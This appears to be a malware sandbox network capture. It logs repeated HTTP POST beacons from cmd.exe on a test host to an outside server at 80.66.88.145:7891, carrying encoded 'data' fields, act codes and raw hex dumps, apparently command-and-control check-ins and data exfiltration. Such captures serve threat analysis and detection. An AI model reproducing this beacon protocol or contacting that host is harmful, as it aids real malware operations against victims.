Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaEylcE7lcEOhcEOlaHYlcE3JcEOrc%2BOlaDylcE7CcEOrboOlaH3lcEfPcEO4cEOlao3lcE36cEOhcDOlaD5lcE3rcEOrboOlaDklcE74cEO4cEOla%2BMlcEYrcEO8aEOlcDOlcEx6cEOhbEOla%2BxlcE36cEOhcDOlaHklcE3XcEOrX%2BOlcDOlcEklcEOrcoOlaDYlcEfmcEOrcoOlaD7lcE36cEO4cEOlcHxlcESlcEO6aoOlaKklcEk4cEOCaoOlaE7lcExJcEO6c%2BOlaoxlcEx6cEO6cDOlaEklcExCcEO4cEOlcHxlcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOraEOlcDOlcE76cEOhc%2BOlaD5lcEfPcEOra%2BOlcDOlcEAecEO6c%2BOlaE5lcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOhcDOlcDOlcE3rcEOhcDOlaH3lcEfecEO4cEOla%2B7lcE7hcEOha%2BOlcHklcE36cEOhbEOlaDklcEfecEOhc%2BOlaD5lcEGPcEOrc%2BOlaH3lcEfecERZcfrVDnAFD7t0%3DYRyDwGF%3DQA9%3DoSdXaRLTE3rcEOdX7O4%2BDxlTKEpvBR2TExdXbD4jGoZaKxlcE3JcEOrc%2BOla%2BSlcEfRcEOhc%2BOlaH3lcE3rcEOhaEOlcDOlcEx4cEOrcoOla%2BYlcE3JcEOrc%2BOlcDOlcExCcEOrboOla%2BYlcE7lcEOrX%2BOlaDylcE7JcEO4cEOlaEylcE3CcEOrcoOla%2BOlcE7CcEOraoOla%2BSlcfhjco5XTK4mnQETDvAbZwYdcoOd6fGbT7RjaDxdXn0TD3xdco7Xc%2BAZhS08nfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
Jul 26, 2023 14:01:05.880832911 CEST | 3 | IN | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 2
Date: Wed, 26 Jul 2023 12:01:05 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.4 | 49721 | 80.66.88.145 | 7891 | C:\Windows\SysWOW64\cmd.exe
Timestamp | kBytes transferred | Direction | Data
Jul 26, 2023 14:02:05.239020109 CEST | 52 | OUT | POST / HTTP/1.0
Host: 80.66.88.145:7891
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
Jul 26, 2023 14:02:05.273132086 CEST | 53 | IN | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4
Date: Wed, 26 Jul 2023 12:02:05 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.4 | 49722 | 80.66.88.145 | 7891 | C:\Windows\SysWOW64\cmd.exe
Timestamp | kBytes transferred | Direction | Data
Jul 26, 2023 14:02:05.335280895 CEST | 54 | OUT | POST / HTTP/1.0
Host: 80.66.88.145:7891
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: application/x-www-form-urlencoded
Content-Length: 520
Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
Jul 26, 2023 14:02:05.380939960 CEST | 54 | IN | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 2
Date: Wed, 26 Jul 2023 12:02:05 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.4 | 49726 | 80.66.88.145 | 7891 | C:\Windows\SysWOW64\cmd.exe
Timestamp | kBytes transferred | Direction | Data
Jul 26, 2023 14:02:09.450376987 CEST | 56 | OUT | POST / HTTP/1.0
Host: 80.66.88.145:7891
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
Jul 26, 2023 14:02:09.488392115 CEST | 56 | IN | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4
Date: Wed, 26 Jul 2023 12:02:09 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.4 | 49727 | 80.66.88.145 | 7891 | C:\Windows\SysWOW64\cmd.exe
Timestamp | kBytes transferred | Direction | Data
Jul 26, 2023 14:02:09.559622049 CEST | 57 | OUT | POST / HTTP/1.0
Host: 80.66.88.145:7891
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: application/x-www-form-urlencoded
Content-Length: 520
Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
Jul 26, 2023 14:02:09.599529982 CEST | 57 | IN | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 2
Date: Wed, 26 Jul 2023 12:02:09 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.4 | 49731 | 80.66.88.145 | 7891 | C:\Windows\SysWOW64\cmd.exe
Timestamp | kBytes transferred | Direction | Data
Jul 26, 2023 14:02:14.224826097 CEST | 60 | OUT | POST / HTTP/1.0
Host: 80.66.88.145:7891
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
Jul 26, 2023 14:02:14.259831905 CEST | 60 | IN | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4
Date: Wed, 26 Jul 2023 12:02:14 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.4 | 49732 | 80.66.88.145 | 7891 | C:\Windows\SysWOW64\cmd.exe
Timestamp | kBytes transferred | Direction | Data
Jul 26, 2023 14:02:14.358042002 CEST | 61 | OUT | POST / HTTP/1.0
Host: 80.66.88.145:7891
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: application/x-www-form-urlencoded
Content-Length: 520
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
                                                        Timestamp: Jul 26, 2023 14:02:14.394020081 CEST | kBytes transferred: 61 | Direction: IN | Data:
                                                        HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:14 GMT


                                                        Session ID: 16 | Source IP: 192.168.2.4 | Source Port: 49736 | Destination IP: 80.66.88.145 | Destination Port: 7891 | Process: C:\Windows\SysWOW64\cmd.exe
                                                        Timestamp: Jul 26, 2023 14:02:18.455609083 CEST | kBytes transferred: 63 | Direction: OUT | Data:
                                                        POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Timestamp: Jul 26, 2023 14:02:18.490295887 CEST | kBytes transferred: 64 | Direction: IN | Data:
                                                        HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:18 GMT


                                                        Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 49741 | Destination IP: 80.66.88.145 | Destination Port: 7891 | Process: C:\Windows\SysWOW64\cmd.exe
                                                        Timestamp: Jul 26, 2023 14:02:22.577147961 CEST | kBytes transferred: 66 | Direction: OUT | Data:
                                                        POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Timestamp: Jul 26, 2023 14:02:22.611957073 CEST | kBytes transferred: 66 | Direction: IN | Data:
                                                        HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:22 GMT


                                                        Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 49745 | Destination IP: 80.66.88.145 | Destination Port: 7891 | Process: C:\Windows\SysWOW64\cmd.exe
                                                        Timestamp: Jul 26, 2023 14:02:27.256772041 CEST | kBytes transferred: 68 | Direction: OUT | Data:
                                                        POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 144
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZa7vrnKnbnz&act=1000
                                                        Timestamp: Jul 26, 2023 14:02:27.291158915 CEST | kBytes transferred: 68 | Direction: IN | Data:
                                                        HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:27 GMT


                                                        Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 49748 | Destination IP: 80.66.88.145 | Destination Port: 7891 | Process: C:\Windows\SysWOW64\cmd.exe
                                                        Timestamp: Jul 26, 2023 14:02:31.437777042 CEST | kBytes transferred: 70 | Direction: OUT | Data:
                                                        POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Timestamp: Jul 26, 2023 14:02:31.472570896 CEST | kBytes transferred: 71 | Direction: IN | Data:
                                                        HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:31 GMT


                                                        Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49696 | Destination IP: 80.66.88.145 | Destination Port: 7891 | Process: C:\Windows\SysWOW64\cmd.exe
                                                        Timestamp: Jul 26, 2023 14:01:10.539072990 CEST | kBytes transferred: 5 | Direction: OUT | Data:
                                                        POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 81
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 53 6c 63 45 37 36 63 45 4f 72 6c 6f 4f 6c 6e 45 52 5a 61 37 76 72 6e 51 49 46 48 77 43 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoSlcE76cEOrloOlnERZa7vrnQIFHwC&act=1000
                                                        Timestamp: Jul 26, 2023 14:01:10.574842930 CEST | kBytes transferred: 5 | Direction: IN | Data:
                                                        HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 4
                                                        Date: Wed, 26 Jul 2023 12:01:10 GMT


                                                        Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 49749 | Destination IP: 80.66.88.145 | Destination Port: 7891 | Process: C:\Windows\SysWOW64\cmd.exe
                                                        Timestamp: Jul 26, 2023 14:02:35.530431032 CEST | kBytes transferred: 71 | Direction: OUT | Data:
                                                        POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Timestamp: Jul 26, 2023 14:02:35.585592985 CEST | kBytes transferred: 72 | Direction: IN | Data:
                                                        HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:35 GMT


                                                        Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 49752 | Destination IP: 80.66.88.145 | Destination Port: 7891 | Process: C:\Windows\SysWOW64\cmd.exe
                                                        Timestamp: Jul 26, 2023 14:02:39.654381037 CEST | kBytes transferred: 73 | Direction: OUT | Data:
                                                        POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Timestamp: Jul 26, 2023 14:02:39.692779064 CEST | kBytes transferred: 73 | Direction: IN | Data:
                                                        HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:39 GMT


                                                        Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 49756 | Destination IP: 80.66.88.145 | Destination Port: 7891 | Process: C:\Windows\SysWOW64\cmd.exe
                                                        Timestamp: Jul 26, 2023 14:02:43.805619955 CEST | kBytes transferred: 75 | Direction: OUT | Data:
                                                        POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Timestamp: Jul 26, 2023 14:02:43.841614008 CEST | kBytes transferred: 75 | Direction: IN | Data:
                                                        HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:43 GMT


                                                        Session ID: 23 | Source IP: 192.168.2.4 | Source Port: 49759 | Destination IP: 80.66.88.145 | Destination Port: 7891 | Process: C:\Windows\SysWOW64\cmd.exe
                                                        Timestamp: Jul 26, 2023 14:02:47.936861038 CEST | kBytes transferred: 77 | Direction: OUT | Data:
                                                        POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Timestamp: Jul 26, 2023 14:02:47.971383095 CEST | kBytes transferred: 77 | Direction: IN | Data:
                                                        HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:47 GMT


                                                        Session ID: 24 | Source IP: 192.168.2.4 | Source Port: 49763 | Destination IP: 80.66.88.145 | Destination Port: 7891 | Process: C:\Windows\SysWOW64\cmd.exe
                                                        Timestamp: Jul 26, 2023 14:02:52.031584978 CEST | kBytes transferred: 79 | Direction: OUT | Data:
                                                        POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Timestamp: Jul 26, 2023 14:02:52.065927029 CEST | kBytes transferred: 79 | Direction: IN | Data:
                                                        HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:52 GMT


                                                        Session ID: 25 | Source IP: 192.168.2.4 | Source Port: 49767 | Destination IP: 80.66.88.145 | Destination Port: 7891 | Process: C:\Windows\SysWOW64\cmd.exe
                                                        Timestamp: Jul 26, 2023 14:02:56.126631021 CEST | kBytes transferred: 81 | Direction: OUT | Data:
                                                        POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Timestamp: Jul 26, 2023 14:02:56.160953999 CEST | kBytes transferred: 81 | Direction: IN | Data:
                                                        HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:56 GMT


                                                        Session ID: 26 | Source IP: 192.168.2.4 | Source Port: 49770 | Destination IP: 80.66.88.145 | Destination Port: 7891 | Process: C:\Windows\SysWOW64\cmd.exe
                                                        Timestamp: Jul 26, 2023 14:03:04.849220991 CEST | kBytes transferred: 83 | Direction: OUT | Data:
                                                        POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Timestamp: Jul 26, 2023 14:03:04.883976936 CEST | kBytes transferred: 83 | Direction: IN | Data:
                                                        HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:03:04 GMT


                                                        Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49697 | Destination IP: 80.66.88.145 | Destination Port: 7891 | Process: C:\Windows\SysWOW64\cmd.exe
                                                        Timestamp: Jul 26, 2023 14:01:11.422662973 CEST | kBytes transferred: 6 | Direction: OUT | Data:
                                                        POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 460
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 53 6c 63 45 37 36 63 45 4f 72 6c 6f 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 51 49 46 48 77 72 5a 63 6f 33 4a 63 45 59 6a 63 45 4f 72 63 6e 72 4c 44 76 25 32 42 77 44 77 45 77 6e 45 78 77 61 6e 68 6c 6e 45 52 5a 61 25 32 42 4d 4a 63 65 26 61 63 74 3d 31 30 30 31
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoSlcE76cEOrloOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnQIFHwrZco3JcEYjcEOrcnrLDv%2BwDwEwnExwanhlnERZa%2BMJce&act=1001
                                                        Timestamp: Jul 26, 2023 14:01:11.466541052 CEST | kBytes transferred: 7 | Direction: IN | Data:
                                                        HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:01:11 GMT


